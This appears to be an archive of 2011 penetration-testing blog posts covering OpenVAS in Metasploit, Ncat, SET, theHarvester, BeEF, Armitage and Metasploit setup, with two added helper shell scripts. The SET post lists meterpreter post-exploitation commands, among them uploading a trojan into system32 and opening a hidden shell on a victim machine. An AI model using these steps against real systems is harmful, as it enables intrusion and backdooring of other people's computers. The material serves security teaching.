
How to Use OpenVAS in Metasploit- OpenVAS & Metasploit Integration

Metasploit includes an OpenVAS module, which allows you to interact with an OpenVAS server to create targets, run scans, download reports, and import reports. Recently I had the opportunity to make some updates to the module and wanted to write a blog post to document how to use it. This blog post does not cover how to set up an OpenVAS server, but you can find that information here and here.


To use the OpenVAS integration you need to load the openvas module within msfconsole. Do this by running the command load openvas. The updates to the openvas module were accepted in revision 13851, so you may need to run msfupdate to get the updated module.
After the module is loaded, the workflow is very basic. Start by connecting to the server using the command openvas_connect. If you connect to a host other than localhost or 127.0.0.1, you will need to pass an additional parameter of "ok" to the command. If you forget the "ok" parameter you will be warned that there is no SSL support and that your interaction with the server is not secure. Also, you need to use the port of the OpenVAS manager server, openvasmd, which defaults to 9390.

msf > openvas_connect sbh sbh 127.0.0.1 9390
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username sbh...
[+] OpenVAS connection successful
Next, create a target to scan using the command openvas_target_create. If you want spaces in the name or comment, make sure you place quotation marks around them.
msf > openvas_target_create "Local Machine" 192.168.70.128 "My Local Machine"
[*] OK, resource created: db1175ac-b40b-4b13-9a80-24b68c2c6b40
[+] OpenVAS list of targets

ID  Name           Hosts           Max Hosts  In Use  Comment
--  ----           -----           ---------  ------  -------
0   Localhost      localhost       1          1
1   Local Machine  192.168.70.128  1          0       My Local Machine
Next, create a task by specifying a target and a configuration. Use the command openvas_config_list to get a list of configurations and the command openvas_target_list to get a list of targets.
msf > openvas_config_list
[+] OpenVAS list of configs

ID Name
-- ----
0 Full and fast
1 Full and fast ultimate
2 Full and very deep
3 Full and very deep ultimate
4 empty

msf > openvas_task_create "Local Scan" "Scan My Local Machine" 0 1
[*] OK, resource created: 483c6f03-6490-4de2-bd81-c1c5b217d950
[+] OpenVAS list of tasks

ID  Name        Comment                Status  Progress
--  ----        -------                ------  --------
0   Local Scan  Scan My Local Machine  New     -1
Next, start the task with openvas_task_start and watch the progress using openvas_task_list.
msf > openvas_task_start 0
[*] OK, request submitted
msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status   Progress
--  ----        -------                ------   --------
0   Local Scan  Scan My Local Machine  Running  2

msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status   Progress
--  ----        -------                ------   --------
0   Local Scan  Scan My Local Machine  Running  98

msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status  Progress
--  ----        -------                ------  --------
0   Local Scan  Scan My Local Machine  Done    -1
Once the scan is finished (the status is Done and the progress is -1), list the available reports using openvas_report_list.
msf > openvas_report_list
[+] OpenVAS list of reports

ID  Task Name     Start Time                Stop Time
--  ---------     ----------                ---------
0   Example task  Tue Aug 25 21:48:25 2009  Tue Aug 25 21:52:16 2009
1   testtask      Fri Sep 16 14:21:31 2011  Fri Sep 16 14:23:09 2011
2   Local Scan    Fri Oct 7 22:52:46 2011   Fri Oct 7 23:04:48 2011
Next, you can download (openvas_report_download) or import (openvas_report_import) the report. You must specify the report format with either command. You can get a list of formats using openvas_format_list. When importing a report you must use the NBE format. Also note that when trying to download an ITG or PDF report my OpenVAS server returns an empty report, YMMV.
msf > openvas_format_list
[+] OpenVAS list of report formats

ID  Name   Extension  Summary
--  ----   ---------  -------
0   CPE    csv        Common Product Enumeration CSV table.
1   HTML   html       Single page HTML report.
2   ITG    csv        German "IT-Grundschutz-Kataloge" report.
3   LaTeX  tex        LaTeX source file.
4   NBE    nbe        Legacy OpenVAS report.
5   PDF    pdf        Portable Document Format report.
6   TXT    txt        Plain text report.
7   XML    xml        Raw XML report.

msf > openvas_report_download 2 1 /root/ov/reports
[*] Saving report to /root/ov/reports/report-d76434b0-38e6-462c-87e1-717622056e86.html

msf > openvas_report_import 2 4
[*] Importing report to database.
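Because openvas_report_import only accepts the NBE format, it helps to know what that file looks like before you import it. The shell script below is an added example written for this page (not code from the original post or from the Metasploit openvas plugin) that summarises an NBE report by host and severity. The sample report embedded in it is constructed, and the pipe-separated layout assumed for a results record (results|subnet|host|port|plugin id|severity|description) is my reading of the legacy Nessus/OpenVAS format, not something the post states.

```shell
#!/bin/sh
# Added example: summarise an OpenVAS NBE report (the legacy format that
# openvas_report_import needs). Not part of the original post or plugin.
# Assumed "results" record layout, pipe-separated:
#   results|<subnet>|<host>|<port>|<plugin id>|<severity>|<description>
# "timestamps" records are ignored.

# Constructed sample report (not real scan output).
SAMPLE_NBE='timestamps|||scan_start|Fri Oct 7 22:52:46 2011|
timestamps||192.168.70.128|host_start|Fri Oct 7 22:52:47 2011|
results|192.168.70|192.168.70.128|general/tcp|10180|Security Note|Host is up
results|192.168.70|192.168.70.128|http (80/tcp)|10107|Security Note|Server banner found
results|192.168.70|192.168.70.128|ssh (22/tcp)|10881|Security Warning|Old protocol version enabled
results|192.168.70|192.168.70.128|smb (445/tcp)|900001|Security Hole|Unpatched service
timestamps||192.168.70.128|host_end|Fri Oct 7 23:04:48 2011|
timestamps||192.168.70.1|host_start|Fri Oct 7 22:52:47 2011|
results|192.168.70|192.168.70.1|general/tcp|10180|Security Note|Host is up
timestamps||192.168.70.1|host_end|Fri Oct 7 22:53:10 2011|
timestamps|||scan_end|Fri Oct 7 23:04:48 2011|'

# nbe_count HOST SEVERITY: number of results records for HOST with SEVERITY.
# Reads the report on stdin; prints 0 when nothing matches.
nbe_count() {
  awk -F'|' -v h="$1" -v s="$2" \
    '$1 == "results" && $3 == h && $6 == s { n++ } END { print n + 0 }'
}

# nbe_hosts_with_holes: hosts that have at least one "Security Hole" record,
# one per line, sorted and de-duplicated. Reads the report on stdin.
nbe_hosts_with_holes() {
  awk -F'|' '$1 == "results" && $6 == "Security Hole" { print $3 }' | sort -u
}

# nbe_summary: one "host severity count" line per host/severity pair.
nbe_summary() {
  awk -F'|' '$1 == "results" { c[$3 " " $6]++ }
             END { for (k in c) print k, c[k] }' | sort
}

# Usage: sh nbe_summary.sh report.nbe
# With no argument the constructed sample above is summarised.
if [ -n "$1" ]; then
  nbe_summary < "$1"
else
  printf '%s\n' "$SAMPLE_NBE" | nbe_summary
fi
```

Run it against a report saved with the NBE format (ID 4 in the list above) to see which hosts carry Security Hole findings before deciding what to import into the Metasploit database.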
You can see all the available commands using the command openvas_help. If you have any questions or find any bugs in the openvas module let me know at averagesecurityguy [at] gmail [dot] com so I can fix them. If you want to look at the code, it is in /opt/framework/msf3/plugins/openvas.rb and /opt/framework/msf3/lib/openvas/openvas-omp.rb. Enjoy.

About the Author
Stephen has over ten years' experience in the information technology field, working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional (CISSP), Offensive Security Certified Professional (OSCP), and GIAC Penetration Tester (GPEN).

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ Thursday 17 November 2011 0 comments

Maltego Tutorial - Mesh Analysis

Maltego is a famous and very useful tool in the process of penetration testing and ethical hacking; it is a powerful tool that helps to gather information from various resources by using various methods. Information gathering or footprinting is the first step of hacking, so the tools that help you in this process are generally the important ones. We have discussed Maltego before on Backtrack 5 and in other ways, so in this article we will discuss Maltego Mesh.

Maltego Information Gathering Backtrack 5

Maltego- Information Gathering Tool Tutorial

FootPrinting-Information Gathering Tutorial

FootPrinting-First Step Of Ethical Hacking

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool

Maltego Mesh is a Firefox plugin that helps analysts quickly find useful information within a page; essentially, it looks at the page you are viewing and tries to identify text within it that matches preset regular expressions.

Usage 

To activate Maltego Mesh, either click View->Sidebar->Maltego Mesh or press Ctrl + Shift + M

Once an entity has been found on a page, it will be shown in the sidebar on the right-hand side of the browser.

Maltego Mesh Tutorial 





~ Thursday 10 November 2011 0 comments

Ncat- Netcat Windows and Linux Tutorial

Netcat is one of the best and most important tools in the field of IT security, penetration testing and ethical hacking; it is also called the Swiss-army knife for TCP/IP. Here TCP/IP does not mean that Netcat works for TCP only; it can be used for UDP as well. The importance of Netcat is no hidden truth: you can use Ncat for many purposes.


If you are using a Linux distribution like Backtrack, Gnacktrack, Backbox or others, then you can find Netcat on it already: open a terminal and type netcat; if it responds, you don't need to install it.
In this article I will cover some basic and advanced usage of Netcat, but before going to the actual tutorial I want to explain some background.

What Is Netcat ?

Netcat is a featured networking utility which reads and writes data across network connections using the TCP/IP protocol. Unix has a cat command, and Netcat was designed to achieve the goal of the cat command over the network; you can use Netcat on various operating systems. The Nmap team designed Ncat on the concept of Netcat, so it is primarily the same thing.

What Netcat Can Do?

This is the most important and simplest question you might wonder about. The answer is that Netcat can do various things, but here are the most important ones.
  • Banner grabbing
  • File transferring
  • Telnet usage
  • Shell backdoor

Download


Tutorial

You can use Ncat on your Windows box too, but for this tutorial I am using Backtrack 5 Linux, so here is the tutorial from basic to advanced. The basic command is as follows:
# ncat
The default port for Netcat is 31337, but you can use other ports as well to connect to the server. Remember this is an Ncat tutorial, so in the commands I will type ncat instead of netcat. You can find help by using this command:
# ncat -h
If you want to learn the banner of a server's software (the process is called banner grabbing), then use the simplest form of the ncat command:
# ncat google.com 80
You might wonder why I have used port number 80: port 80 is for HTTP, and sometimes a large server uses firewalls or an IDS, so other ports might be closed.


 
So by banner grabbing you can get valuable information.
You can send any file to another server or client computer. Here is the main command; replace the IP address with your desired IP. The listener serves the contents of test.txt to the client that connects on that port:
# ncat -l 127.0.0.1 80 < test.txt
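The two sides of that file transfer, plus the check a practitioner would add, as an added example (a shell script written for this page, not code from the original post): the listener serves the file, the receiver connects and saves it, and because Netcat moves bytes in cleartext with no integrity protection of its own, both ends compare a SHA-256 digest afterwards. It assumes the Nmap ncat binary (its --send-only and --recv-only options); the port number, file names and sample contents are constructed.

```shell
#!/bin/sh
# Added example for the Ncat file transfer above; not code from the original post.
# Assumes Nmap's ncat with --send-only / --recv-only. Port and file names are
# constructed placeholders.

# digest FILE: print the SHA-256 hex digest (sha256sum on Linux, shasum elsewhere).
digest() {
  if command -v sha256sum > /dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# nc_serve_file FILE PORT: listen on 127.0.0.1:PORT, send FILE to the first
# client that connects, then exit (this is the "ncat -l ... < file" side).
nc_serve_file() {
  ncat --send-only -l 127.0.0.1 "$2" < "$1"
}

# nc_fetch_file PORT OUT: connect to 127.0.0.1:PORT and save what arrives to OUT.
nc_fetch_file() {
  ncat --recv-only 127.0.0.1 "$1" > "$2"
}

# verify_transfer ORIGINAL RECEIVED: succeed only if both digests match.
verify_transfer() {
  [ "$(digest "$1")" = "$(digest "$2")" ]
}

# transfer_roundtrip FILE PORT: run both sides on localhost and verify.
# Returns 0 on a verified transfer, 1 on mismatch, 2 when ncat is not installed.
transfer_roundtrip() {
  command -v ncat > /dev/null 2>&1 || return 2
  out="$1.received"
  nc_serve_file "$1" "$2" &
  sleep 1                       # let the listener bind before connecting
  nc_fetch_file "$2" "$out"
  wait                          # reap the listener
  verify_transfer "$1" "$out"
}

# Usage: sh nc_transfer.sh file_to_send [port]   (port 8080 is a constructed default)
if [ -n "$1" ]; then
  transfer_roundtrip "$1" "${2:-8080}" && echo "transfer verified"
fi
```

On a real engagement the two halves run on different hosts: the sender runs nc_serve_file with its own address in place of 127.0.0.1, the receiver runs nc_fetch_file against that address, and each side prints digest of its copy and compares them out of band.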


~ Thursday 1 September 2011 0 comments

Grendel Scan Web Application Security Scanner

Web application security scanners are very important in the process of penetration testing. If you want to test your web application against the known and most dangerous vulnerabilities like SQL injection and cross-site scripting, then you should use automatic tools that crawl the website and check for vulnerabilities that can be exploited.

There are a lot of web security scanners available, both commercial and open source; we have discussed Wapiti, Nikto and w3af before, and commercial tools include Netsparker and Acunetix.

Linux distributions that were created for penetration testing, like Backtrack, Gnacktrack, Backbox and Blackbuntu, have different tools for website penetration testing. In this article I will discuss an open source web application security scanner called Grendel-Scan that was released at the DEF CON event.

What Is Grendel-Scan

Grendel-Scan is an open-source web application security testing tool. It has an automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available.
Backtrack 5 contains different web application security scanners, and it contains Grendel-Scan too. In the tutorial I will use Backtrack 5; however, you can install and use it on other Linux distributions and on Windows.

Download


It requires Java to run. If you are using Backtrack 5, then you can get Grendel-Scan from Applications-->backtrack-->Vulnerability assessment-->web application assessment-->web vulnerability scanner-->grendel-scan.

Grendel-Scan Tutorial


It is not a difficult tool to use, and it has a graphical user interface, so you can easily understand it and fit it into your web security testing process. Here is a short description of the basic usage.

Enter the target website and, if you want to use a proxy server, enter it as well.

You can choose from a variety of options, and you can integrate Nikto with Grendel-Scan.

~ Tuesday 16 August 2011 0 comments

Social Engineering toolkit Tutorial-Backtrack 5

Social engineering, also known as human hacking, is the act of manipulating the human mind to get the desired result. Social engineering is a general term, and in daily life everyone practices it, but the use of social engineering in hacking and penetration testing is a little different. The main uses of social engineering in hacking are to get information, to maintain access, and so on.

There are various social engineering tips and tricks available on the Internet; besides these tips there is a social engineering toolkit available for carrying out computer-based social engineering attacks.

What Is Social Engineering Toolkit


In this article I will discuss the usage of the Social-Engineering Toolkit on Backtrack 5 to compromise a Windows operating system, but before going to the actual tutorial I want to share a basic introduction to the toolkit that will really help beginners.
The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
The Social-Engineering Toolkit is available on Backtrack 5, Backbox, Blackbuntu, Gnacktrack and other Linux distributions that are used for penetration testing.

Download



If you are using some other Linux distribution, then use this command to get SET:
svn co http://svn.secmaniac.com/social_engineering_toolkit set/

Social Engineering Toolkit Tutorial

For this tutorial I am using Backtrack 5, and the tutorial will teach you a single method to own a computer using SET, while more SET tutorials will be posted in later articles. For the best result I have made a video tutorial.

As I said in the video, more commands are in the article, so here are the necessary commands.
ps
The ps command displays a list of running processes on the target.
meterpreter > ps
Download
meterpreter > download c:\\boot.ini
Upload
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Execute
meterpreter > execute -f cmd.exe -i -H
shell
If you want to get a DOS prompt on the victim PC for downloading and uploading your backdoor and other jobs, use shell.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy the article, then drop your comments.


~ Saturday 13 August 2011 0 comments

Theharvester Backtrack 5- Information Gathering Tutorial

Information is a weapon. A successful penetration test and a hacking process need a lot of relevant information, which is why information gathering, also called footprinting, is the first step of hacking. An intelligent penetration tester uses intelligent tools and techniques to get the right information at the right time; for social engineering (human hacking) you need relevant information about a person. So the point of this little discussion is to realize the importance of information gathering.

What Is TheHarvester

After getting some knowledge about information gathering you might be interested in knowing how to perform it. TheHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key servers. This tool was designed to help the penetration tester at an early stage; it is an effective and simple tool that is very easy to use.

Supported Sources for Information Gathering

  • Google - emails,subdomains/hostnames
  • Google profiles - Employee names
  • Bing search - emails, subdomains/hostnames,virtual hosts
  • Pgp servers - emails, subdomains/hostnames
  • Linkedin - Employee names
  • Exalead - emails,subdomain/hostnames

Related Information Gathering Tutorials

Footprinting or information gathering is not a new term, and we have published many articles with different tools and techniques before for both Windows and Linux (Ubuntu, Backtrack); here is the comprehensive list of articles.

FootPrinting-First Step Of Ethical Hacking

Maltego- Information Gathering Tool Tutorial

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool

Download Theharvester



If you are using Backtrack 5 or other versions of Backtrack, then you do not need to download theHarvester because it is available on Backtrack, while for other Linux distributions like Ubuntu you download and install it. You can also use theHarvester on other operating systems, because it only needs Python to run. If you are using Blackbuntu, then theHarvester is available on it too.

TheHarvester Tutorial

TheHarvester is a very easy tool to use; just follow the tutorial to get the best result. On Backtrack, open a terminal and change to the directory:
root@bt:/pentest/enumeration/theharvester#
For other distributions, change to the directory where you installed it. For the best result I use the command:
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d google.com -l 500 -b google
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d targetsite.com -l 500 -b google
So here is the result with complete details.
I hope you are enjoying the reading. Now use this wonderful tool yourself, and if you have any question, ask via the comment box.


~ Friday 12 August 2011 0 comments

Tips to Improve Linux Backtrack 5 Performance

If you are using Backtrack 5 and having some problems like sound problems, social media software problems, software manager problems and many more: some of the blog readers have sent requests about these things. If you have used Ubuntu, then you have an idea of how easy and user-friendly the tweaks and software manager in Ubuntu are; for Backtrack 5 you can do all these things as well, because it is based on Ubuntu.
For this tutorial I am using the GNOME-based Backtrack 5, so below are some tips to make your BT5 a desktop operating system that contains all the necessary tools and software.
Movie/Video player for GNOME
There are different programs available for GNOME-based distributions; among them the Totem media player for Linux is the best. Open a terminal and type:
sudo apt-get install totem-gstreamer
Besides the Totem media player you can install the VLC player for Linux, or you can install VLC for Windows on BT5 by using Wine.
TeamViewer
TeamViewer is the best software for desktop sharing, and it is available for Windows and Linux. Go to the official website and download a copy, then open the terminal, change to the download directory and type:
sudo dpkg -i teamviewer_linux.deb
Zip & Unzip for Linux
If you want to open zip files and are having problems with them, then you must install zip and unzip for Linux. Open the terminal and type:
sudo apt-get install zip
Empathy Chat Client for Linux
If you are a social kind of person and want to connect with people via chat, then you should install Empathy, because it provides the best chat platforms in a single place. Open a terminal and type:
sudo apt-get install empathy
PDF Reader for Linux
You can install Adobe Reader on Linux, but there is another program available to read PDF files: Foxit Reader. Download it from the official website, change to the download directory in the terminal and type:
sudo dpkg -i FoxitReader_1.1.0_i386.deb
Office for Linux
OpenOffice is the best solution for office users on an open source platform; get it by using the command:
sudo apt-get install openoffice.org
Software Manager for Linux
A software manager is the right place to search for and get the right open source software. If your Linux does not have a software manager, then you must install kate for it in the terminal:
apt-get install kate
Firewall for Linux
Have you ever checked your ports by using nmap? If not, then you are in the dark: open ports are the weakest point of system security, and you must close your ports. To close ports in Linux use a firewall; the Firestarter firewall is the best, get it via:
sudo apt-get install firestarter
Gwibber Social Media Client
Social media, including Twitter, Facebook and more, has become more powerful and successful, so if you want to use all these social networking websites in a single place, then get Gwibber:
sudo apt-get install gwibber
FTP Client for Linux
FTP (File Transfer Protocol) is an important protocol for transferring large files. If you want to connect to any server via FTP, then you must have a client like gFTP; get it with:
sudo apt-get install gftp
If you are experiencing sound and voice problems in Backtrack 5 (Ubuntu) Linux, then you must take care of codecs and other restrictions of Ubuntu:
sudo apt-get install ubuntu-restricted-extras
sudo apt-get install w32codecs
sudo apt-get install w32codecs libdvdcss2
How to Update & Upgrade Linux
It is a better policy to update all the software and packages frequently to avoid any kind of exploitation. For a complete Linux upgrade (installing the newest available versions of the installed packages) use:
sudo apt-get upgrade
While for updating the package lists of all the software and packages use:
sudo apt-get update

~ Friday 5 August 2011 0 comments

Maltego Information Gathering Backtrack 5

Information gathering or footprinting is generally the first step of the ethical hacking/penetration testing process. The more information you have, the more chance of success; information gathering is the important phase because the whole process of hacking is based on the information you have. Backtrack, and specially Backtrack 5, contains a list of tools that will help you to gather information, such as DNSenum for DNS information gathering.

Maltego is an intelligent application that will help you to gather maximum information about people, about networks and more. It has broad features to discuss, but the main aim of writing this article is not to discuss the features of Maltego; the aim is to demonstrate Maltego on the Backtrack 5 platform.

The Maltego tutorial has been discussed before on Ubuntu with videos; click here to learn.
  • For BT5, go to Applications-->Backtrack-->Information Gathering-->Network Analysis-->DNS Analysis-->Maltego
  • The first window will ask you to register your product.
  • After registration you will be able to use Maltego; if you do not register your product, then you will not be able to use it.
  • At the top there are two tabs, Investigate and Manage.
  • Go to the Manage tab, then open a new page.
  • There are a lot of different entities available on the screen, but the main option is the Palette option that is available on the left side; if you have not registered the product, then you will not recognize it.
  • Now at this point everything is the same as discussed in the previous Maltego tutorial; follow that tutorial to run and use it.


FootPrinting-Information Gathering Tutorial

FootPrinting-First Step Of Ethical Hacking

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool


~ Tuesday 26 July 2011 0 comments

BeEF- Browser Exploitation Framework

Technology has no end and no boundary. We have discussed different web and network vulnerability scanning tools and techniques to exploit something; besides vulnerability scanning tools there are different ways and tools available for exploitation. You might have heard about server-side exploits, but what if someone exploits your browser? Yes, you must care about your browser too.

Below is a small study on browser exploitation that will really help you to increase your knowledge and skills.

In general, browser exploitation means taking advantage of a vulnerability in the software (maybe the OS) to change and alter browser settings without the knowledge of the user. There are different techniques and tools available, but this time we will talk about BeEF, the best browser exploitation framework.

BeEF is pioneering techniques that provide the experienced penetration tester with practical client-side attack vectors. BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target; BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. The framework allows the penetration tester to select specific modules (in real time) to target each browser.

Tutorial
You can get many tutorials from the official website of BeEF; click here to learn.
BeEF is also available on Backtrack, so if you have expertise with the Backtrack platform you might already know about it.

Here is a video tutorial of BeEF; this tutorial is by Jabra, and with many thanks we would like to share it here.
     




~ Tuesday 7 June 2011 0 comments

OWASP Zed Attack Proxy- ZAP

OWASP, or the Open Web Application Security Project, is a worldwide non-profit organisation that focuses on improving the security of web applications; for more about OWASP click here. There are different automatic tools available for testing the security of a web application, and there are different tools for proxy-based attacks, but this time we will discuss ZAP, the Zed Attack Proxy.

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has automatic scanning functionality, and it has a set of tools that allow you to find vulnerabilities manually.

ZAP provides a basic port scanner which shows which ports are open on the target sites. ZAP is an intercepting proxy: it allows you to see all of the requests you make to a web application and all of the responses you receive from it. Amongst other things this allows you to see AJAX calls that may not otherwise be obvious.

ZAP passively scans all of the responses from the web application being tested. Passive scanning does not change the responses in any way and is therefore safe to use.

Tutorial

You need Java to run the application. After downloading and installing it, set your browser to use the localhost proxy, then open a terminal, change to the directory where ZAP was installed, and type:
$ java -jar zap.jar
The overall process is the same as for Paros Proxy, because ZAP is a fork of Paros Proxy.




~ Sunday 5 June 2011 0 comments

Armitage - Cyber Attack Management

Technology has no end. In the previous article we discussed the Metasploit framework, which has changed the way penetration testing is done. Armitage is a graphical cyber attack management tool for Metasploit that visualises your targets, recommends exploits, and exposes the advanced capabilities of the framework.

When Metasploit and Armitage meet, they make a powerful cyber attack management tool for doing penetration testing on a network. Armitage allows your team to use the same sessions, share data, and communicate through one Metasploit instance. It is a very helpful tool for learning about cyber security because it provides a graphical interface instead of the command line.

Just like Metasploit, Armitage is also available for different operating systems like Linux, Windows and Mac. Below is the tutorial on how to get and install Armitage.

Tutorial
Requirement
Install Armitage On Linux
You can install Armitage with a simple command, but before executing this command you need to be the root user, so open a terminal and type exactly:
$ sudo su
# apt-get install armitage
We need to enable the RPC daemon for Metasploit; use this command in the terminal:
root@bt:~# msfrpcd -f -U msf -P test -t Basic
Now start the MySQL server so that Armitage can store results:
root@bt:~# /etc/init.d/mysql start
Now it is time to run Armitage; change to its directory and type:
root@bt:/pentest/exploits/armitage# ./armitage.sh
After this a new window should appear; set up the default host name, and if you want to use SSL then tick it.





~ Monday 30 May 2011 0 comments

Metasploit- An Introduction

If you are active in the community of penetration testers/ethical hackers, then you have heard about Metasploit, because it is the most famous tool, used by most penetration testers as well as by hackers. Metasploit is an open source computer security project that contains information about vulnerabilities.
If you put all the available exploits in a single place, then the phenomenon of Metasploit occurs.
The Metasploit framework is a sub-project and is used to execute exploit code against a machine and get the desired task done.

Before discussing how to do all these things, you need to understand some basic terms: vulnerability, exploit and payload. A vulnerability is a weakness or a hole by which an attacker can compromise a machine. An exploit may be a piece of code; it is an attack that takes advantage of a vulnerability. A payload is the piece of software that lets you control a computer system after it has been exploited.

The Metasploit project provides Metasploit Pro, Metasploit Express and the Metasploit framework. The Metasploit framework is open source and available for free for cross-platform use (Windows, Linux).

How To Install Metasploit

In this tutorial we will discuss how to get and install the Metasploit framework for both Windows and Linux (like Ubuntu); if you are using Backtrack, then you can find Metasploit there already.
Install Metasploit on Ubuntu:

We need some packages to install Metasploit; open a terminal and type exactly:
$ sudo apt-get install ruby libruby rdoc
$ sudo apt-get install libyaml-ruby
$ sudo apt-get install libzlib-ruby
$ sudo apt-get install libopenssl-ruby
$ sudo apt-get install libdl-ruby
$ sudo apt-get install libreadline-ruby
$ sudo apt-get install libiconv-ruby
$ sudo apt-get install rubygems
Click here to download Metasploit; in this case we have downloaded the Linux-full.run file. You need to become the root user to run this installer; in the terminal type:
$ sudo su
Now change to the directory where you downloaded Metasploit and type:
$ ./name_of_file.run

Now just go forward and accept the agreement. After installation, to run Metasploit, in the terminal type:
$ msfconsole
Install Metasploit on Windows:
If you want to install Metasploit on Windows, then you need to download the Metasploit executable; click here to download. The installer includes the packages:
• Console2
• Ruby 1.9.2
• PostgreSQL
• Java JDK 6
• Subversion
• VNCViewer
• WinVI32
• Nmap 5.6
So you don't need to download any other file; just run the installer and you are done!
     


~ Sunday 29 May 2011 0 comments